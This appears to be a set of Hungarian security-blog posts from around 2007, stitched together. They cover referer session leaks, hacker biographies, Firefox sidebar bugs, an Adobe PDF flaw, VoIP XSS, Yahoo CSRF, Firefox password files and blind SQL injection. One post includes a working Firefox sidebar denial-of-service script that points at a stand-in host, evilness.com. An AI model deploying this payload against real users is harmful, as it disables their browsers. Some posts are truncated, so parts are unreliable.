Kicsit elszégyelltem magam, miután elolvastam a legutóbbi poszot a Hacker Webzine-en, amiben Ronald azt ecseteli, hogy miként tudná megtörni a Microsoftos kollegák SharePoint szerverét. Az arcpirító a dologban egyrészt az, hogy a módszer végtelenül primitív, nekem mégsem jutott eddig eszembe, a rosszab viszont az, hogy nem is védekeztem ellene soha, bár ezzel ahogy látom nem vagyok egyedül....

A lénygre térve: ma éppen kaptam egy kedves levelet egy olvasótól, amiben egy link volt mellékelve, amire nyugodt szívvel rá is kattintottam. Ki kell ábrándítsam azokat, akikben felébredt a vírusvadász, nem valami trükkös gonosz szkript futott le a gépemen, megkerülve a NoScriptet, meg a Linux autentikációs mechanizmusait, ennél sokkal prózaibb a helyzet. Ha ugyanis történetesen a kedves levélíró valójában egy gonosz gazficó, aki monitorozta az oldalára érkező látógatók refererjeit, akkor egy pillanat alatt megszerezhette a webmailemhez tartozó aktuális session azonosítót!

Tanúlság: kapcsoljuk ki a referer küldését a böngészőnkben! Firefox alatt az about:config oldalra navigáva a network.http.sendRefererHeader értékét kell ehhez 0-ra állítanunk. Esetleg felinstallálhatjuk ezen kiegészítések valamelyikét, hogy jobban testreszabhassuk a böngésző referer küldési szokásait. Nem mellesleg a referer hamisítás alkalmas lehet sql injection vagy xss támadások kivitelezésére is, ha meglátogatott weboldal lognézegetője hibásan van megvalósítva.

Az Apple alapítója. Karrierjét blue-boxok építésével kezdte, melyeket aztán osztálytársainak árult. A blue-box egy olyan eszköz, amely egy speciális frekvencia (2600Hz) kiadásával alkalmas volt arra, hogy segítségével az analóg telefonrendszereken keresztül ingyen bonyolítsunk távolsági hívásokat. Nos, Woz egyszer Henry Kissingernek adva ki magát a Pápát hívta fel...

A tehetséges diákot kirúgták az iskolából, ez után már volt ideje Steve Jobsszal kitalálni és megalkotni az Apple I-t, melynek darabját 666,66$-ért adták el egy helyi kereskedőnek.

Wozniak az Applenek hátatfordítva jelenleg jótékonysággal foglalkozik: A Los Gatos Union School Districtben oktat valamint technikai eszközökkel látja el az ott tanuló illetve dolgozó tanárokat és diákokat.

A World Wide Web kiagyalója. Berners-Leet először az Oxfordi Egyetemen kapták hackelésen, ezután eltiltották az iskola számítógépeitől. A WWW létrejötte után megalapította a World Wide Web Konzorciumot, amely a mai napig az ingyenes és szabad webes szabványok első számú karbantartója.

Linux rendszerek atyja. Sikres operációs rendszerét mérnöki kedvtelésből kezdte el írni, hogy "jót szórakozzon miközben megírja a legjobb rohadt operációs rendszert amit csak tud". Egyik első számítógépének, egy Sinclar QL-nek már módosította az operációs rendszerét, és írt hozzá többek között egy assemblert egy szövegszerkesztőt és néhány játékot is. A Linux kernelt 1991-ben alkotta meg, először csak egy taszkváltóval és egy terminal driverrel, majd másokat is megkért, hogy adjanak kódot a rendzsermaghoz.

Torvalds kódja jelenleg a Linux kernel 2%-át teszi ki, a hacker leginkább a fejlesztések koordinálásáról gondoskodik.

A GNU Project alapítója, melynek célja egy teljesen szabad operációs rendszer létrehozása. Emiatt a szabad szoftver atyjának tartják. Filozófiája szerint " A zárt szoftver megosztja a felhasználókat, és tehetetlenné teszi őket azáltal, hogy nem nyújt lehetőséget a módosítására és a megosztására. Egy szabad operációs rendszer elengedhetetlen eszköz ahhoz, hogy az emberek szabadon használhassák a számítástechnikát."

Stallman az MIT-n dolgozott többek között az Emacs fejlesztésén. Nem nézte jó szemmel a korlátozott számítógéphasználatot a laboratóriumban, ezért az összes jelszót kinullázta majd értesítette a felhasználókat a "változásról".

Stallman nevéhez fűződik többek között a GNU C Compiler (melyet a legendák szerint a világtól teljesen elvonulva, egyhuzamban írt meg) és a GNU Debugger is. Jelenleg a szabad szoftver egyik legnagyobb élharcosa, munkája elismeréseként négyszer avatták tiszteletbeli doktorrá.

Kevin Mitnick tevékenységének egyik áldozata, majd végzete. Az őt ért támadás után jelentős szerepet játszott Mitnick elfogásában. Csapatával bemérték vetélytársa mobiltelefonját, majd egy speciális antenna segítségével meghatározták a préda pontos helyét, innentől pedig az FBI-nak már nem volt nehéz dolga.

Ronald ma reggel vadászni indult. Firefox hibákra vadászni. Nem régen leste ki a gazfickók egyik rejtekhelyét: az oldalsávot, a helyet, amiről a legtöbb ember azt sem tudja, hogy létezik! A vadász szimata jó volt, nem tért haza üres kézzel:

Az első hiba/feature segítségével arra vehetjük rá a gyanútlan felhasználókat, hogy olyan könyvjelzőket hozzanak létre, melyek neve nem tükrözi az URL-t amit takarnak:

A második hiba egy jól megtermett perzisztens DoS, lényegében az előző továbbfejlesztése. A következő kódrészlet által beállított könyvjelzőre kattintva, a böngésző nem hajlandó többé megjeleníteni bármilyen URL-t. Akkor sem ha újraindítjuk! El kell valahogy tüntetni az oldalsáv paneljét, vagy újrainstallálni a böngészőt. Az alábbi kód nem biztos hogy megfelelő számú A-t tartalmaz, de Ronald új találmánya, a BrowserFry elég hamar megolja ezt a problémát (is).

<script>
window.sidebar.addPersistentPanel('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRGGHH!
...és még több AA!:)',
'http://www.evilness.com/h4x0r.do','\0');
</script>

Update: Ez utóbbi hiba kihasználását megleshetitek itt(.avi), ha nem akarjátok a saját böngészőtöket kockáztatni.

Kis kiegészítés a vállalkozó kedvűeknek: A program az NVIDIA CUDA C fordítót és fejlesztői eszközt használja, amely nyílt interfészen biztosít hozzáférést a GeForce 8-as kártyák GPU-jához. Hasonló alkalmazást fejleszteni tehát relative könnyű, annyi a probléma, hogy csak a CUDA támogatott kártyákkal (GeForce 8) fog működni a progi, de ha a cég által közzétett eredmények nagyjából fedik a valóságot, akkor már simán megéri beruházni pár új videókártyára (az enyém már amúgy sem támogatott :D).

Update2: az azért nem teljesen korrekt, hogy az Elcomsoft kétes hírű lenne, a cég '90 óta létezik, és Microsoft Gold CertifiedPartner...

Anno elmulasztottam megemlíteni a Petko Petkov Adobe PDF hibát, amely parancsfuttatást tesz lehetővé PDF fájlokon keresztül. Ha jól emlékszem ennek egyik oka az volt, hogy nem volt elérhető PoC vagy egyéb leírás a hibával kapcsolatban, ezért úgy gondoltam, hogy a megfelelő hírportálok majd úgyis tájékoztatnak mindenkit. Ma azonban az Antivírus blogon értesültem róla, hogy mivel az Adobe kiadta a megfelelő frissítést, és az élelmes vírusírók/hackerek kihámozták, hogy mi volt a probléma, most már létezik PoC, meg persze féreg is, ami a hibát kártékonyan kihasználja. Íme egy megbuherált PDF érdekes része:

Látható, hogy itt is a már sokat emlegetett URI kezelőkön keresztül hajdódik végre a megfelelő parancs, valaki elmagyarázhatná, hogy ezekhez miért fér így hozzá mindenki...

A hiba csak Windowson használható ki, érintettek az Adobe Reader, Acrobat, és 3D termékei, ezeket érdemes minél előbb frissíteni, vagy Rambo ajánlásának megfelelően alternetív PDF olvasót/operációs rendszert használni.

"Pénteken érkezik a kereskedelmi hálózatba a Mac OS X legújabb, 10.5-ös verziószámú, "Leopard" kódnévre hallgató kiadása. Az Apple néhány napja fellebbentette a fátylat az OS X legújabb nagy verziójának újdonságairól, amelyek közt 11 új biztonsági szolgáltatást is kap majd az ügyfél." - HUP

Nem is olyan régen volt alkalmam Windows Vista-n dolgozni, és ez a három dolog maradt meg bennem az operációs rendszerrel kapcsolatban:

• A kezelhetőséget megpróbálták az OS X szintjére emelni
• A biztonság terén a Linux útját követték
• Ennek eredményeként eléggé meg lehet izzadni, mire az ember ráveszi a gépet, hogy az a kívánt működést produkálja

Ezek után rendkívül kíváncsi voltam, hogy az Apple is beleesik-e a Microsoft hibáiba, szóval gyorsan elolvastam amit lehetett a dologgal kapcsolatban, és bár az új  rendszert még nem próbálhattam ki, a következőket emelném ki:

• A letöltött alkalmazások megcimkézése: Ez nyilván ugyanúgy a felhasználók agyára fog menni, mint a Windows esetében, azonban fontos különbség, hogy a Leopard amellett, hogy figyelmeztet a letöltött alkalmazások veszélyeire, arra is felhívja a figyelmet, hogy melyik alkalmazás, mikor és honnan töltötte le a programot. Ez azért is fontos, mert ha Gizike minden letöltött alkalmazás esetében ugyanazzal a figyelmeztető ablakkal találkozik, egy idő után reflexből kattint a "Folytatás"-ra, míg egy kódolt URL vagy egy IP cím már nagyobb eséllyel kelti fel a gyanút az egyszerűbb felhasználóban is.
• Hitelesített alkalmazások: Ezt már az XP is tudta, de nekem egyszer sem működött. Ha az Apple-nek sikerül jól használható lehetőséget biztosítani a külső fejelsztők számára alkalmazásaik hitelesítésére, ez a funkció rengeteg terhet vehet le a felhasználók válláról.
• Sandboxing: Helyes, jó ötlet, gratula! Nem muszáj minden alkalmazásnak minden erőforráshoz hozzáférnie, maradjon a homokozóban, akinek elég a szita meg a kisvödör! Aztán meglátjuk, lesz-e olyan okos kópé, aki a homokvárból veszi be a játszóteret...
• Library Randomization: Szintén jó ötlet, ez a technika már sok helyen bizonyított, a Vista is ezzel erősít szerencsére.

Összességében úgy látom, hogy a fejlesztők jobban megtalálták az egyensúlyt a biztonság és a használhatóság között, a többi új feature (melyek hiánya a Vista esetében szintén fájó pont volt) pedig valószínűleg kellő kárpótlást nyújt majd az okozott kellemetlenségekért. Minden esetre izgalommal várom az első Leopardos exploitokat, ígérem Ti sem maradtok le róluk!

Nos, azt nevezzük science-fictionnek, de nem kell megijedni, nem irodalmi értekezés következik. Csupán Sandro Gauci cyberpunk szösszenetét szeretném a figyelmetekbe ajánlani, melyen keresztül a szerző a saját maga által készített SIPVicious programgyűjtemény használatát szemlélteti. Érdekes próbálkozás, én jót szórakoztam rajta, nem lenne rossz, ha több szoftverhez is ilyen formában készítenének manualt :)

Az olvasmányt innen szedhetitek le, angolul van, szűk 4 oldal, sok képernyőképpel.

Michal Sobieraj szemléletes cikkében azt elemzi, hogy hogyan kezelik a különböző böngészők a speciális Unicode karaktereket tartalmazó URL-eket. Szabadfordítás következik:

Azokat az URL-eket, amelyek nem-ASCII karaktereket is tartalmaznak, mindig ASCII kompatibilis formában (valahogy így xn--t-zfa.com) kellene a felhasználók számára megjeleníteni, hogy a vizuális megtévesztések elkerülhetők legyenek.

Úgy tűnik azonban, hogy néhány Unicode mellékjel meg tudja kerülni ezt a szabályt bizonyos elterjedt böngésző esetében.

Egyes híresztelések szerint a NASA arra kéri alkalmazottait és partnereit, hogy ne használjanak Internet Explorert, mivel a böngésző ActiveX vezérlőjén keresztül egy új Real Player sebezhetőséget (azt elárulná valaki, hogy a sebezhető rendszerek felsorolásához hogy kerül a SuSE Linux?) használnak ki rosszindulatú támadók.

Bár a hiba kihasználására nem ismerünk publikus exploitot, a Symanteces szakértők azt gyanítják, hogy egy korábbi DoS-t okozó támadás továbbfejlesztéséről van szó. A támadás egy speciális weboldal segítségével történik, amely ellenőrzi a telepített RealPlayer verziókat, és ha sebezhető változatot talál, trójai programot telepít a látogató gépére. A sikeres támadást a RealPlayer példavideójának lejátszása jelzi.

A támadás ellen legegyszerűbben a következő registry kulcs beállításával védekezhetünk:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\
ActiveX Compatibility\{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}

de természetesen az ActiveX vezérlők és a JavaScvript letiltása is segít.

Na, kissé sok volt a dolgom az elmúlt pár napban, mostanra sikerült magam átrágnom a Crypto-Gramon, amiben Schneier úr megint megmondja a tutit :)

Szóval a globális terrorpara legújabb eredménye az a brit törvény, amely öt évig terjedő szabadságvesztéssel bünteti, ha valaki nem hajlandó kiadni a titkosításhoz használt kulcsait a rendőrségnek.

Ez nagyon remek, végre a gonosz pedofilok meg terroristák nem rejthetik mocskos kis titkaikat mindenféle matematikai problémák mögé! Vagy mégsem?

Ha kocka lennék most azt mondanám, lol. Mondjuk kocka vagyok, de csak azért sem mondom :) Szóval hogy a fenébe lehet cross-site scriptinget csinálni egy telefonnal? A válasz egyszerű, ha el sikerül vonatkoztatnunk a manapság leggyakrabban használt vezetékes és mobil készülékektől: VoIP telefont fogunk hackelni, méghozzá hardot!

A célpont egy Linksys SPA-941 típusú VoIP telefon lesz, amely egy beépített webkiszolgálóval rendelkezik, melyen keresztül elvégezhető egy csomó hasznos telefonnal kapcsolatos tennivaló. Ezek egyike a nem fogadott hívások listázása, melynek során azt találjuk, hogy a From mező értéke nincs megfelelően szűrve. Nosza, küldjünk egy speciális SIP csomagot a telefonnak a következő feladóval:

A következő alkalommal, amikor valaki utánanéz a nem fogadott hívásoknak , szépen lefut a távoli szkript, és hopp, kompromitáltuk is a gépet! A legjobb az egészben, hogy ha egy belső hálón lévő telefont "hívunk fel", simán átmászhatunk a céges tűzfalon is (ha Jeremiah Grossmann vonatkozó írását megtalálja valaki, pls küldje be kommentbe)!

A módszert Radu State küldte be a Full-Disclosure-re, további infot ott találtok.

Mint arról már a HUP is hírt adott, sikeresen kijátszották az iPhone új firmware-rel érkező védelmét, amely megakadályozza a harmadik féltől származó adatok feltöltését a telefonra. A "jailbreaket" ugyanazzal a TIFF képek kezelésénel jelentkező buffer overflow hiba kihasználásával érték el, amelyet több mint egy éve a PSP-k hackeléséhez használtak.

A dolog azért nem volt ennyire egyszerű, a PSP-k ugyanis MIPS, az iPhone-ok viszont ARM architektúrájú processort használnak, ráadásul az okostelefon vermében lévő kódot nem lehet futtatni. Az exploit ezért kicsit módosításra került, bele kerültek az architektúrát érintő változások, valamint a jailbreak kódot nem a stackből, hanem a heapből futtatja.

A vállalkozó kedvűek az iPhone teljes filerendszeréhez hozzáférhetnek néhány egyszerű lépés megtételével.

A heise Security cikke itt.

A vihar csendesedni látszik a Google körül, de a szél a felhőket a Yahoo felé sodorja: Nitesh Dhanjani két CSRF támadást mutatott be a Yahoo ellen. A kihasznált hibák nem a fő webes alkalmazásokat, hanem a mobil eszközökre szánt WAP és mobil web szolgáltatásokat érintik (mint anno a Freemailnél - ha emlékszik rá egyáltalán valaki ;), de a támadások weben kereszül is kivitelezhetők.

Az első, kevésbé súlyos hiba a Yahoo Instant Messengert érinti. Az alábbi kódot tartalmazó weboldalt meglátogató felhasználót kilépteti a rendszer:

A második, jóval súlyosabb hiba a Naptár szolgáltatást érinti, az alábbi kód segítségével tetszőleges bejegyzést adhatunk vagy törölhetünk az aktív Yahoo sessionnel rendelkező naptárjához/ból:

A hiba remek lehetőséget nyújt az adathalászoknak, spammereknek, illetve más típusú csalóknak. Dhanjani értesítette a Yahoot a dologról, reméljük mielőbb megszületik a javítás!

Miközben az előző poszthoz gyűjtöttem az infókat egy kis érdekességbe botlottam:

Előszeretettel használom a Firefoxnak azt a funkcióját, ami törli a személyes adataimat a program bezárásakor. Pá-pá terhelő bizonyítékok tracker cookiek! Miközben azonban a mentett jelszavaimat tartalmazó fájlt nézegettem (igen, vannak mentett jelszavaim, természetesem egyikkel sem érek el érzékeny adatokat) arra lettem figyelmes, hogy a fájl eleje tele van olyan odlalak URL-jeivel, amelyeknél ugyan regisztrálva vagyok, de a belépési információimat nem mentettem el. Namármost, ha valaki regisztrál mondjuk a wetriffs.com-ra, és nem szeretné, hogy a családja/kollegái/hatóság/spammerek erről tudomást szerezzenek, akkor törli a history-t, a cookie-kat, nem menti el a jelszavát, és úgy érzi, soha nem derül fény mocskos kis titkára. Pedig de.

A nagy sikerre való tekintettel folytatódik a kívánságműsor. A pártatlanság jegyében az Internet Explorer után most a Firefox jelszótárolási szokásait elemezzük ki - bár az iPhone magyarországi megjelenéséről és a Yahoo Messenger magyarításáról többen érdeklődtek, ezek kevésbé illeszkednek a blog témájához.

Nos, a platformfüggetlenség és nyíltság jegyében a Firefox nem hagyatkozhat olyan egyedi szolgáltatásokra mint a rendszerleíró adatbázis, ezért a perzisztens adatok tárolására egyszerű szöveges állományokat használ. Az elmentett jelszavakat tartalmazó állomány Windows rendszereken a

%userprofile%\Application Data\Mozilla\Firefox Profiles\xxxxxxxx.default\signons.txt

Na igen, ennél a pontnál nyelte el a blog.hu a posztom másik felét...

A blind (vak) SQL injectiont hagyományosan úgy szokás felfogni, mint egy bináris keresést az ASCII táblán, vagy annak egy részén.  Ennek lépésszáma O(log2 n)-nel arányos, ahol n a teljes ASCII táblát figyelembe véve 255 (a nullbyte nem érdekes), így a logaritmus értéke kb. 8 lesz, azaz átlagosan ennyi kérést kell intéznünk a sebezhető kiszolgálóhoz, hogy egy mező egy karakterét megkapjuk. Persze senki nem szereti felhívni magára a figyelmet, ezért érdemes elgondolkodni azon, hogy hogyan lehetne ezt a számot minál inkább csökkenteni. Stefano Di Paola egy pofonegyszerű ötletet mutat be a blogjában (bár valószínűleg nem ő volt az első, aki ezt a módszert használta, az ötlet tulajdonképpen triviális)

Szokatlanul agyafúrt módszerrel próbálták becserkészni a Chinese Internet Security Response Team (CISRT) angol nyelvű oldalának látogatóit. A támadók a szokásos <iframe> injektálós trükkött alkalmazták azzal a csavarral, hogy a veszélyes kód nem minden látogató számára töltődött le.

Ez nagyban megnehezíti a támadás észrevételét valamint annak céljának és módszereinek felderítését. Az eddigi vizsgálatok eredményei azt mutatják, hogy a véletlenszerűen kiválasztott felhasználókat ARP spoofing vagy poisoning segítségével próbálják rávenni, hogy megbízhatatlan tartalmakat töltsön le idegen szerverekről.

Hétvégén uborkaszezon volt, tegnap viszont beindultak a dolgok, csak én nem voltam gépközelben:

Még a blog indulása környékén írtam Ronald véletlen felfedezéséről melynek segítségével elvileg a Google találati listájának élére (vagy legalábbis annak ε sugarú környezetébe ;) lehet kerülni. A most kivitelezett támadás hasonló a bemutatott módszerhez, valamint bevet néhány további régi trükköt.

Jónéhány kínai site elkezdett legitim amerikai oldalakat másolni, valamint gyakori kulcsszavak millióival pumpálták tele magukat, így ezn keresőkifejezések használatakor a valódi oldalakat megelőzve a kínai spammer oldalak kerültek a találati lista élére. Az ezeket meglátogató felhasználók azonban nem a keresőmotor által beindexelt weblapot, hanem egy attól lényegesen különböző, kártékony kóddal telepakolt oldalt kaptak az arcukba. További érdekesség, hogy a spamsiteokat úgy tűnik, senki sem hosztolja, így nem teljesen világos, hogy hogyan kerülhettek be a Google látókörébe.

Bár pánikra egyelőre nincs ok, ha a Google nem tud megoldást taáláni az ilyen jellgű támadások kivédésére, annak nagyon komoly gazdasági következményei lehetnek. Ronald írt erről egy igen lényegretörő cikket, amit mindenkinek ajánlok elolvasásra!